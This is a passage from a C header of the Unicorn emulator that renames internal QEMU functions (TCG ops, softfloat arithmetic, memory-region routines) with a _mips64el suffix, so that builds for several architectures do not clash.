#ifndef UNICORN_ARCH_POSTFIX
#define UNICORN_ARCH_POSTFIX _mips64el
#endif
#define unicorn_fill_tlb unicorn_fill_tlb_mips64el #define reg_read reg_read_mips64el #define reg_write reg_write_mips64el #define uc_init uc_init_mips64el #define uc_add_inline_hook uc_add_inline_hook_mips64el #define uc_del_inline_hook uc_del_inline_hook_mips64el #define tb_invalidate_phys_range tb_invalidate_phys_range_mips64el #define use_idiv_instructions use_idiv_instructions_mips64el #define arm_arch arm_arch_mips64el #define tb_target_set_jmp_target tb_target_set_jmp_target_mips64el #define have_bmi1 have_bmi1_mips64el #define have_popcnt have_popcnt_mips64el #define have_avx1 have_avx1_mips64el #define have_avx2 have_avx2_mips64el #define have_isa have_isa_mips64el #define have_altivec
have_altivec_mips64el #define have_vsx have_vsx_mips64el #define flush_icache_range flush_icache_range_mips64el #define s390_facilities s390_facilities_mips64el #define tcg_dump_op tcg_dump_op_mips64el #define tcg_dump_ops tcg_dump_ops_mips64el #define tcg_gen_and_i64 tcg_gen_and_i64_mips64el #define tcg_gen_discard_i64 tcg_gen_discard_i64_mips64el #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_mips64el #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_mips64el #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_mips64el #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_mips64el #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_mips64el #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_mips64el #define tcg_gen_ld_i64 tcg_gen_ld_i64_mips64el #define tcg_gen_mov_i64 tcg_gen_mov_i64_mips64el #define tcg_gen_movi_i64 tcg_gen_movi_i64_mips64el #define tcg_gen_mul_i64 tcg_gen_mul_i64_mips64el #define tcg_gen_or_i64 tcg_gen_or_i64_mips64el #define tcg_gen_sar_i64 tcg_gen_sar_i64_mips64el #define tcg_gen_shl_i64 tcg_gen_shl_i64_mips64el #define tcg_gen_shr_i64 tcg_gen_shr_i64_mips64el #define tcg_gen_st_i64 tcg_gen_st_i64_mips64el #define tcg_gen_xor_i64 tcg_gen_xor_i64_mips64el #define cpu_icount_to_ns cpu_icount_to_ns_mips64el #define cpu_is_stopped cpu_is_stopped_mips64el #define cpu_get_ticks cpu_get_ticks_mips64el #define cpu_get_clock cpu_get_clock_mips64el #define cpu_resume cpu_resume_mips64el #define qemu_init_vcpu qemu_init_vcpu_mips64el #define cpu_stop_current cpu_stop_current_mips64el #define resume_all_vcpus resume_all_vcpus_mips64el #define vm_start vm_start_mips64el #define address_space_dispatch_compact address_space_dispatch_compact_mips64el #define flatview_translate flatview_translate_mips64el #define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips64el #define qemu_get_cpu qemu_get_cpu_mips64el #define cpu_address_space_init cpu_address_space_init_mips64el #define cpu_get_address_space cpu_get_address_space_mips64el #define cpu_exec_unrealizefn cpu_exec_unrealizefn_mips64el #define cpu_exec_initfn cpu_exec_initfn_mips64el #define cpu_exec_realizefn cpu_exec_realizefn_mips64el #define tb_invalidate_phys_addr tb_invalidate_phys_addr_mips64el #define cpu_watchpoint_insert cpu_watchpoint_insert_mips64el #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips64el #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips64el #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mips64el #define cpu_breakpoint_insert cpu_breakpoint_insert_mips64el #define cpu_breakpoint_remove cpu_breakpoint_remove_mips64el #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips64el #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips64el #define cpu_abort cpu_abort_mips64el #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_mips64el #define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips64el #define flatview_add_to_dispatch flatview_add_to_dispatch_mips64el #define qemu_ram_get_host_addr qemu_ram_get_host_addr_mips64el #define qemu_ram_get_offset qemu_ram_get_offset_mips64el #define qemu_ram_get_used_length qemu_ram_get_used_length_mips64el #define qemu_ram_is_shared qemu_ram_is_shared_mips64el #define qemu_ram_pagesize qemu_ram_pagesize_mips64el #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips64el #define qemu_ram_alloc qemu_ram_alloc_mips64el #define qemu_ram_free qemu_ram_free_mips64el #define qemu_map_ram_ptr qemu_map_ram_ptr_mips64el #define qemu_ram_block_host_offset 
qemu_ram_block_host_offset_mips64el #define qemu_ram_block_from_host qemu_ram_block_from_host_mips64el #define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips64el #define cpu_check_watchpoint cpu_check_watchpoint_mips64el #define iotlb_to_section iotlb_to_section_mips64el #define address_space_dispatch_new address_space_dispatch_new_mips64el #define address_space_dispatch_free address_space_dispatch_free_mips64el #define flatview_read_continue flatview_read_continue_mips64el #define address_space_read_full address_space_read_full_mips64el #define address_space_write address_space_write_mips64el #define address_space_rw address_space_rw_mips64el #define cpu_physical_memory_rw cpu_physical_memory_rw_mips64el #define address_space_write_rom address_space_write_rom_mips64el #define cpu_flush_icache_range cpu_flush_icache_range_mips64el #define cpu_exec_init_all cpu_exec_init_all_mips64el #define address_space_access_valid address_space_access_valid_mips64el #define address_space_map address_space_map_mips64el #define address_space_unmap address_space_unmap_mips64el #define cpu_physical_memory_map cpu_physical_memory_map_mips64el #define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips64el #define cpu_memory_rw_debug cpu_memory_rw_debug_mips64el #define qemu_target_page_size qemu_target_page_size_mips64el #define qemu_target_page_bits qemu_target_page_bits_mips64el #define qemu_target_page_bits_min qemu_target_page_bits_min_mips64el #define target_words_bigendian target_words_bigendian_mips64el #define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips64el #define ram_block_discard_range ram_block_discard_range_mips64el #define ramblock_is_pmem ramblock_is_pmem_mips64el #define page_size_init page_size_init_mips64el #define set_preferred_target_page_bits set_preferred_target_page_bits_mips64el #define finalize_target_page_bits finalize_target_page_bits_mips64el #define cpu_outb cpu_outb_mips64el #define cpu_outw cpu_outw_mips64el #define cpu_outl cpu_outl_mips64el #define cpu_inb cpu_inb_mips64el #define cpu_inw cpu_inw_mips64el #define cpu_inl cpu_inl_mips64el #define memory_map memory_map_mips64el #define memory_map_io memory_map_io_mips64el #define memory_map_ptr memory_map_ptr_mips64el #define memory_cow memory_cow_mips64el #define memory_unmap memory_unmap_mips64el #define memory_moveout memory_moveout_mips64el #define memory_movein memory_movein_mips64el #define memory_free memory_free_mips64el #define flatview_unref flatview_unref_mips64el #define address_space_get_flatview address_space_get_flatview_mips64el #define memory_region_transaction_begin memory_region_transaction_begin_mips64el #define memory_region_transaction_commit memory_region_transaction_commit_mips64el #define memory_region_init memory_region_init_mips64el #define memory_region_access_valid memory_region_access_valid_mips64el #define memory_region_dispatch_read memory_region_dispatch_read_mips64el #define memory_region_dispatch_write memory_region_dispatch_write_mips64el #define memory_region_init_io memory_region_init_io_mips64el #define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips64el #define memory_region_size memory_region_size_mips64el #define memory_region_set_readonly memory_region_set_readonly_mips64el #define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips64el #define memory_region_from_host memory_region_from_host_mips64el #define memory_region_get_ram_addr memory_region_get_ram_addr_mips64el #define memory_region_add_subregion memory_region_add_subregion_mips64el 
#define memory_region_del_subregion memory_region_del_subregion_mips64el #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips64el #define memory_region_find memory_region_find_mips64el #define memory_region_filter_subregions memory_region_filter_subregions_mips64el #define memory_listener_register memory_listener_register_mips64el #define memory_listener_unregister memory_listener_unregister_mips64el #define address_space_remove_listeners address_space_remove_listeners_mips64el #define address_space_init address_space_init_mips64el #define address_space_destroy address_space_destroy_mips64el #define memory_region_init_ram memory_region_init_ram_mips64el #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips64el #define find_memory_mapping find_memory_mapping_mips64el #define exec_inline_op exec_inline_op_mips64el #define floatx80_default_nan floatx80_default_nan_mips64el #define float_raise float_raise_mips64el #define float16_is_quiet_nan float16_is_quiet_nan_mips64el #define float16_is_signaling_nan float16_is_signaling_nan_mips64el #define float32_is_quiet_nan float32_is_quiet_nan_mips64el #define float32_is_signaling_nan float32_is_signaling_nan_mips64el #define float64_is_quiet_nan float64_is_quiet_nan_mips64el #define float64_is_signaling_nan float64_is_signaling_nan_mips64el #define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips64el #define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips64el #define floatx80_silence_nan floatx80_silence_nan_mips64el #define propagateFloatx80NaN propagateFloatx80NaN_mips64el #define float128_is_quiet_nan float128_is_quiet_nan_mips64el #define float128_is_signaling_nan float128_is_signaling_nan_mips64el #define float128_silence_nan float128_silence_nan_mips64el #define float16_add float16_add_mips64el #define float16_sub float16_sub_mips64el #define float32_add float32_add_mips64el #define float32_sub float32_sub_mips64el #define float64_add float64_add_mips64el #define float64_sub float64_sub_mips64el #define float16_mul float16_mul_mips64el #define float32_mul float32_mul_mips64el #define float64_mul float64_mul_mips64el #define float16_muladd float16_muladd_mips64el #define float32_muladd float32_muladd_mips64el #define float64_muladd float64_muladd_mips64el #define float16_div float16_div_mips64el #define float32_div float32_div_mips64el #define float64_div float64_div_mips64el #define float16_to_float32 float16_to_float32_mips64el #define float16_to_float64 float16_to_float64_mips64el #define float32_to_float16 float32_to_float16_mips64el #define float32_to_float64 float32_to_float64_mips64el #define float64_to_float16 float64_to_float16_mips64el #define float64_to_float32 float64_to_float32_mips64el #define float16_round_to_int float16_round_to_int_mips64el #define float32_round_to_int float32_round_to_int_mips64el #define float64_round_to_int float64_round_to_int_mips64el #define float16_to_int16_scalbn float16_to_int16_scalbn_mips64el #define float16_to_int32_scalbn float16_to_int32_scalbn_mips64el #define float16_to_int64_scalbn float16_to_int64_scalbn_mips64el #define float32_to_int16_scalbn float32_to_int16_scalbn_mips64el #define float32_to_int32_scalbn float32_to_int32_scalbn_mips64el #define float32_to_int64_scalbn float32_to_int64_scalbn_mips64el #define float64_to_int16_scalbn float64_to_int16_scalbn_mips64el #define float64_to_int32_scalbn float64_to_int32_scalbn_mips64el #define float64_to_int64_scalbn float64_to_int64_scalbn_mips64el #define float16_to_int16 
float16_to_int16_mips64el #define float16_to_int32 float16_to_int32_mips64el #define float16_to_int64 float16_to_int64_mips64el #define float32_to_int16 float32_to_int16_mips64el #define float32_to_int32 float32_to_int32_mips64el #define float32_to_int64 float32_to_int64_mips64el #define float64_to_int16 float64_to_int16_mips64el #define float64_to_int32 float64_to_int32_mips64el #define float64_to_int64 float64_to_int64_mips64el #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_mips64el #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_mips64el #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_mips64el #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips64el #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips64el #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips64el #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips64el #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips64el #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips64el #define float16_to_uint16_scalbn float16_to_uint16_scalbn_mips64el #define float16_to_uint32_scalbn float16_to_uint32_scalbn_mips64el #define float16_to_uint64_scalbn float16_to_uint64_scalbn_mips64el #define float32_to_uint16_scalbn float32_to_uint16_scalbn_mips64el #define float32_to_uint32_scalbn float32_to_uint32_scalbn_mips64el #define float32_to_uint64_scalbn float32_to_uint64_scalbn_mips64el #define float64_to_uint16_scalbn float64_to_uint16_scalbn_mips64el #define float64_to_uint32_scalbn float64_to_uint32_scalbn_mips64el #define float64_to_uint64_scalbn float64_to_uint64_scalbn_mips64el #define float16_to_uint16 float16_to_uint16_mips64el #define float16_to_uint32 float16_to_uint32_mips64el #define float16_to_uint64 float16_to_uint64_mips64el #define float32_to_uint16 float32_to_uint16_mips64el #define float32_to_uint32 float32_to_uint32_mips64el #define float32_to_uint64 float32_to_uint64_mips64el #define float64_to_uint16 float64_to_uint16_mips64el #define float64_to_uint32 float64_to_uint32_mips64el #define float64_to_uint64 float64_to_uint64_mips64el #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_mips64el #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_mips64el #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_mips64el #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips64el #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips64el #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips64el #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips64el #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips64el #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips64el #define int64_to_float16_scalbn int64_to_float16_scalbn_mips64el #define int32_to_float16_scalbn int32_to_float16_scalbn_mips64el #define int16_to_float16_scalbn int16_to_float16_scalbn_mips64el #define int64_to_float16 int64_to_float16_mips64el #define int32_to_float16 int32_to_float16_mips64el #define int16_to_float16 int16_to_float16_mips64el #define int64_to_float32_scalbn int64_to_float32_scalbn_mips64el #define int32_to_float32_scalbn int32_to_float32_scalbn_mips64el #define int16_to_float32_scalbn int16_to_float32_scalbn_mips64el #define int64_to_float32 int64_to_float32_mips64el 
#define int32_to_float32 int32_to_float32_mips64el #define int16_to_float32 int16_to_float32_mips64el #define int64_to_float64_scalbn int64_to_float64_scalbn_mips64el #define int32_to_float64_scalbn int32_to_float64_scalbn_mips64el #define int16_to_float64_scalbn int16_to_float64_scalbn_mips64el #define int64_to_float64 int64_to_float64_mips64el #define int32_to_float64 int32_to_float64_mips64el #define int16_to_float64 int16_to_float64_mips64el #define uint64_to_float16_scalbn uint64_to_float16_scalbn_mips64el #define uint32_to_float16_scalbn uint32_to_float16_scalbn_mips64el #define uint16_to_float16_scalbn uint16_to_float16_scalbn_mips64el #define uint64_to_float16 uint64_to_float16_mips64el #define uint32_to_float16 uint32_to_float16_mips64el #define uint16_to_float16 uint16_to_float16_mips64el #define uint64_to_float32_scalbn uint64_to_float32_scalbn_mips64el #define uint32_to_float32_scalbn uint32_to_float32_scalbn_mips64el #define uint16_to_float32_scalbn uint16_to_float32_scalbn_mips64el #define uint64_to_float32 uint64_to_float32_mips64el #define uint32_to_float32 uint32_to_float32_mips64el #define uint16_to_float32 uint16_to_float32_mips64el #define uint64_to_float64_scalbn uint64_to_float64_scalbn_mips64el #define uint32_to_float64_scalbn uint32_to_float64_scalbn_mips64el #define uint16_to_float64_scalbn uint16_to_float64_scalbn_mips64el #define uint64_to_float64 uint64_to_float64_mips64el #define uint32_to_float64 uint32_to_float64_mips64el #define uint16_to_float64 uint16_to_float64_mips64el #define float16_min float16_min_mips64el #define float16_minnum float16_minnum_mips64el #define float16_minnummag float16_minnummag_mips64el #define float16_max float16_max_mips64el #define float16_maxnum float16_maxnum_mips64el #define float16_maxnummag float16_maxnummag_mips64el #define float32_min float32_min_mips64el #define float32_minnum float32_minnum_mips64el #define float32_minnummag float32_minnummag_mips64el #define float32_max float32_max_mips64el #define float32_maxnum float32_maxnum_mips64el #define float32_maxnummag float32_maxnummag_mips64el #define float64_min float64_min_mips64el #define float64_minnum float64_minnum_mips64el #define float64_minnummag float64_minnummag_mips64el #define float64_max float64_max_mips64el #define float64_maxnum float64_maxnum_mips64el #define float64_maxnummag float64_maxnummag_mips64el #define float16_compare float16_compare_mips64el #define float16_compare_quiet float16_compare_quiet_mips64el #define float32_compare float32_compare_mips64el #define float32_compare_quiet float32_compare_quiet_mips64el #define float64_compare float64_compare_mips64el #define float64_compare_quiet float64_compare_quiet_mips64el #define float16_scalbn float16_scalbn_mips64el #define float32_scalbn float32_scalbn_mips64el #define float64_scalbn float64_scalbn_mips64el #define float16_sqrt float16_sqrt_mips64el #define float32_sqrt float32_sqrt_mips64el #define float64_sqrt float64_sqrt_mips64el #define float16_default_nan float16_default_nan_mips64el #define float32_default_nan float32_default_nan_mips64el #define float64_default_nan float64_default_nan_mips64el #define float128_default_nan float128_default_nan_mips64el #define float16_silence_nan float16_silence_nan_mips64el #define float32_silence_nan float32_silence_nan_mips64el #define float64_silence_nan float64_silence_nan_mips64el #define float16_squash_input_denormal float16_squash_input_denormal_mips64el #define float32_squash_input_denormal float32_squash_input_denormal_mips64el #define 
float64_squash_input_denormal float64_squash_input_denormal_mips64el #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips64el #define roundAndPackFloatx80 roundAndPackFloatx80_mips64el #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips64el #define int32_to_floatx80 int32_to_floatx80_mips64el #define int32_to_float128 int32_to_float128_mips64el #define int64_to_floatx80 int64_to_floatx80_mips64el #define int64_to_float128 int64_to_float128_mips64el #define uint64_to_float128 uint64_to_float128_mips64el #define float32_to_floatx80 float32_to_floatx80_mips64el #define float32_to_float128 float32_to_float128_mips64el #define float32_rem float32_rem_mips64el #define float32_exp2 float32_exp2_mips64el #define float32_log2 float32_log2_mips64el #define float32_eq float32_eq_mips64el #define float32_le float32_le_mips64el #define float32_lt float32_lt_mips64el #define float32_unordered float32_unordered_mips64el #define float32_eq_quiet float32_eq_quiet_mips64el #define float32_le_quiet float32_le_quiet_mips64el #define float32_lt_quiet float32_lt_quiet_mips64el #define float32_unordered_quiet float32_unordered_quiet_mips64el #define float64_to_floatx80 float64_to_floatx80_mips64el #define float64_to_float128 float64_to_float128_mips64el #define float64_rem float64_rem_mips64el #define float64_log2 float64_log2_mips64el #define float64_eq float64_eq_mips64el #define float64_le float64_le_mips64el #define float64_lt float64_lt_mips64el #define float64_unordered float64_unordered_mips64el #define float64_eq_quiet float64_eq_quiet_mips64el #define float64_le_quiet float64_le_quiet_mips64el #define float64_lt_quiet float64_lt_quiet_mips64el #define float64_unordered_quiet float64_unordered_quiet_mips64el #define floatx80_to_int32 floatx80_to_int32_mips64el #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips64el #define floatx80_to_int64 floatx80_to_int64_mips64el #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips64el #define floatx80_to_float32 floatx80_to_float32_mips64el #define floatx80_to_float64 floatx80_to_float64_mips64el #define floatx80_to_float128 floatx80_to_float128_mips64el #define floatx80_round floatx80_round_mips64el #define floatx80_round_to_int floatx80_round_to_int_mips64el #define floatx80_add floatx80_add_mips64el #define floatx80_sub floatx80_sub_mips64el #define floatx80_mul floatx80_mul_mips64el #define floatx80_div floatx80_div_mips64el #define floatx80_rem floatx80_rem_mips64el #define floatx80_sqrt floatx80_sqrt_mips64el #define floatx80_eq floatx80_eq_mips64el #define floatx80_le floatx80_le_mips64el #define floatx80_lt floatx80_lt_mips64el #define floatx80_unordered floatx80_unordered_mips64el #define floatx80_eq_quiet floatx80_eq_quiet_mips64el #define floatx80_le_quiet floatx80_le_quiet_mips64el #define floatx80_lt_quiet floatx80_lt_quiet_mips64el #define floatx80_unordered_quiet floatx80_unordered_quiet_mips64el #define float128_to_int32 float128_to_int32_mips64el #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips64el #define float128_to_int64 float128_to_int64_mips64el #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips64el #define float128_to_uint64 float128_to_uint64_mips64el #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_mips64el #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_mips64el #define float128_to_uint32 float128_to_uint32_mips64el #define float128_to_float32 
float128_to_float32_mips64el #define float128_to_float64 float128_to_float64_mips64el #define float128_to_floatx80 float128_to_floatx80_mips64el #define float128_round_to_int float128_round_to_int_mips64el #define float128_add float128_add_mips64el #define float128_sub float128_sub_mips64el #define float128_mul float128_mul_mips64el #define float128_div float128_div_mips64el #define float128_rem float128_rem_mips64el #define float128_sqrt float128_sqrt_mips64el #define float128_eq float128_eq_mips64el #define float128_le float128_le_mips64el #define float128_lt float128_lt_mips64el #define float128_unordered float128_unordered_mips64el #define float128_eq_quiet float128_eq_quiet_mips64el #define float128_le_quiet float128_le_quiet_mips64el #define float128_lt_quiet float128_lt_quiet_mips64el #define float128_unordered_quiet float128_unordered_quiet_mips64el #define floatx80_compare floatx80_compare_mips64el #define floatx80_compare_quiet floatx80_compare_quiet_mips64el #define float128_compare float128_compare_mips64el #define float128_compare_quiet float128_compare_quiet_mips64el #define floatx80_scalbn floatx80_scalbn_mips64el #define float128_scalbn float128_scalbn_mips64el #define softfloat_init softfloat_init_mips64el #define tcg_optimize tcg_optimize_mips64el #define gen_new_label gen_new_label_mips64el #define tcg_can_emit_vec_op tcg_can_emit_vec_op_mips64el #define tcg_expand_vec_op tcg_expand_vec_op_mips64el #define tcg_register_jit tcg_register_jit_mips64el #define tcg_tb_insert tcg_tb_insert_mips64el #define tcg_tb_remove tcg_tb_remove_mips64el #define tcg_tb_lookup tcg_tb_lookup_mips64el #define tcg_tb_foreach tcg_tb_foreach_mips64el #define tcg_nb_tbs tcg_nb_tbs_mips64el #define tcg_region_reset_all tcg_region_reset_all_mips64el #define tcg_region_init tcg_region_init_mips64el #define tcg_code_size tcg_code_size_mips64el #define tcg_code_capacity tcg_code_capacity_mips64el #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_mips64el #define tcg_malloc_internal tcg_malloc_internal_mips64el #define tcg_pool_reset tcg_pool_reset_mips64el #define tcg_context_init tcg_context_init_mips64el #define tcg_tb_alloc tcg_tb_alloc_mips64el #define tcg_prologue_init tcg_prologue_init_mips64el #define tcg_func_start tcg_func_start_mips64el #define tcg_set_frame tcg_set_frame_mips64el #define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips64el #define tcg_temp_new_internal tcg_temp_new_internal_mips64el #define tcg_temp_new_vec tcg_temp_new_vec_mips64el #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_mips64el #define tcg_temp_free_internal tcg_temp_free_internal_mips64el #define tcg_const_i32 tcg_const_i32_mips64el #define tcg_const_i64 tcg_const_i64_mips64el #define tcg_const_local_i32 tcg_const_local_i32_mips64el #define tcg_const_local_i64 tcg_const_local_i64_mips64el #define tcg_op_supported tcg_op_supported_mips64el #define tcg_gen_callN tcg_gen_callN_mips64el #define tcg_op_remove tcg_op_remove_mips64el #define tcg_emit_op tcg_emit_op_mips64el #define tcg_op_insert_before tcg_op_insert_before_mips64el #define tcg_op_insert_after tcg_op_insert_after_mips64el #define tcg_cpu_exec_time tcg_cpu_exec_time_mips64el #define tcg_gen_code tcg_gen_code_mips64el #define tcg_gen_op1 tcg_gen_op1_mips64el #define tcg_gen_op2 tcg_gen_op2_mips64el #define tcg_gen_op3 tcg_gen_op3_mips64el #define tcg_gen_op4 tcg_gen_op4_mips64el #define tcg_gen_op5 tcg_gen_op5_mips64el #define tcg_gen_op6 tcg_gen_op6_mips64el #define tcg_gen_mb tcg_gen_mb_mips64el #define 
tcg_gen_addi_i32 tcg_gen_addi_i32_mips64el #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_mips64el #define tcg_gen_subi_i32 tcg_gen_subi_i32_mips64el #define tcg_gen_andi_i32 tcg_gen_andi_i32_mips64el #define tcg_gen_ori_i32 tcg_gen_ori_i32_mips64el #define tcg_gen_xori_i32 tcg_gen_xori_i32_mips64el #define tcg_gen_shli_i32 tcg_gen_shli_i32_mips64el #define tcg_gen_shri_i32 tcg_gen_shri_i32_mips64el #define tcg_gen_sari_i32 tcg_gen_sari_i32_mips64el #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips64el #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips64el #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips64el #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_mips64el #define tcg_gen_muli_i32 tcg_gen_muli_i32_mips64el #define tcg_gen_div_i32 tcg_gen_div_i32_mips64el #define tcg_gen_rem_i32 tcg_gen_rem_i32_mips64el #define tcg_gen_divu_i32 tcg_gen_divu_i32_mips64el #define tcg_gen_remu_i32 tcg_gen_remu_i32_mips64el #define tcg_gen_andc_i32 tcg_gen_andc_i32_mips64el #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_mips64el #define tcg_gen_nand_i32 tcg_gen_nand_i32_mips64el #define tcg_gen_nor_i32 tcg_gen_nor_i32_mips64el #define tcg_gen_orc_i32 tcg_gen_orc_i32_mips64el #define tcg_gen_clz_i32 tcg_gen_clz_i32_mips64el #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_mips64el #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_mips64el #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_mips64el #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_mips64el #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_mips64el #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips64el #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips64el #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips64el #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips64el #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips64el #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_mips64el #define tcg_gen_extract_i32 tcg_gen_extract_i32_mips64el #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_mips64el #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_mips64el #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips64el #define tcg_gen_add2_i32 tcg_gen_add2_i32_mips64el #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_mips64el #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips64el #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips64el #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_mips64el #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips64el #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips64el #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips64el #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips64el #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips64el #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips64el #define tcg_gen_smin_i32 tcg_gen_smin_i32_mips64el #define tcg_gen_umin_i32 tcg_gen_umin_i32_mips64el #define tcg_gen_smax_i32 tcg_gen_smax_i32_mips64el #define tcg_gen_umax_i32 tcg_gen_umax_i32_mips64el #define tcg_gen_abs_i32 tcg_gen_abs_i32_mips64el #define tcg_gen_addi_i64 tcg_gen_addi_i64_mips64el #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_mips64el #define tcg_gen_subi_i64 tcg_gen_subi_i64_mips64el #define tcg_gen_andi_i64 tcg_gen_andi_i64_mips64el #define tcg_gen_ori_i64 tcg_gen_ori_i64_mips64el #define tcg_gen_xori_i64 tcg_gen_xori_i64_mips64el #define tcg_gen_shli_i64 tcg_gen_shli_i64_mips64el #define tcg_gen_shri_i64 tcg_gen_shri_i64_mips64el #define tcg_gen_sari_i64 tcg_gen_sari_i64_mips64el #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips64el #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_mips64el #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_mips64el #define tcg_gen_setcondi_i64 
tcg_gen_setcondi_i64_mips64el #define tcg_gen_muli_i64 tcg_gen_muli_i64_mips64el #define tcg_gen_div_i64 tcg_gen_div_i64_mips64el #define tcg_gen_rem_i64 tcg_gen_rem_i64_mips64el #define tcg_gen_divu_i64 tcg_gen_divu_i64_mips64el #define tcg_gen_remu_i64 tcg_gen_remu_i64_mips64el #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_mips64el #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_mips64el #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips64el #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_mips64el #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_mips64el #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips64el #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_mips64el #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_mips64el #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_mips64el #define tcg_gen_not_i64 tcg_gen_not_i64_mips64el #define tcg_gen_andc_i64 tcg_gen_andc_i64_mips64el #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_mips64el #define tcg_gen_nand_i64 tcg_gen_nand_i64_mips64el #define tcg_gen_nor_i64 tcg_gen_nor_i64_mips64el #define tcg_gen_orc_i64 tcg_gen_orc_i64_mips64el #define tcg_gen_clz_i64 tcg_gen_clz_i64_mips64el #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_mips64el #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_mips64el #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_mips64el #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_mips64el #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_mips64el #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_mips64el #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_mips64el #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_mips64el #define tcg_gen_rotri_i64 